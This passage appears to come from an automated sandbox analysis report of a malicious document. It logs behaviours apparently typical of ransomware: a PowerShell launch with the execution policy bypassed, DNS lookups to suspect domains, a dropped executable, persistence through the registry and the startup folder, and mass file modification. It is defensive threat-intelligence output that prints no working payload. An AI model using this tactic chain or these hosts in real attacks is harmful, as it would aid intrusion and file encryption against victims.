"Local\!PrivacIE!SharedMemory!Mutex". Create system object Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\cmd.exe". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe". Create process Process VTI rule match with VTI rule score 1/5 vmray_install_ipc_endpoint Create mutex with name "Global\.net clr networking". Create system object Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "w-szczecin.pl". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe". Create process Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_registry Add "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" to windows startup via registry. Install system startup script or application Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "v4.ident.me". Perform DNS request Network VTI rule match with VTI rule score 3/5 vmray_request_dns_by_name Resolve host name "beer-ranking.pl". Perform DNS request Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "CMD.exe". Create process Persistence VTI rule match with VTI rule score 3/5 vmray_install_startup_script_by_file Add "c:\users\kft6utqw\appdata\roaming\microsoft\windows\start menu\programs\startup" to windows startup folder. Install system startup script or application Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"". Create process Process VTI rule match with VTI rule score 4/5 vmray_document_create_process Create process "C:\Windows\system32\taskkill.exe". Create process File System VTI rule match with VTI rule score 5/5 vmray_modify_user_files Modify the content of multiple user files. This is an indicator for an encryption attempt. Modify content of user files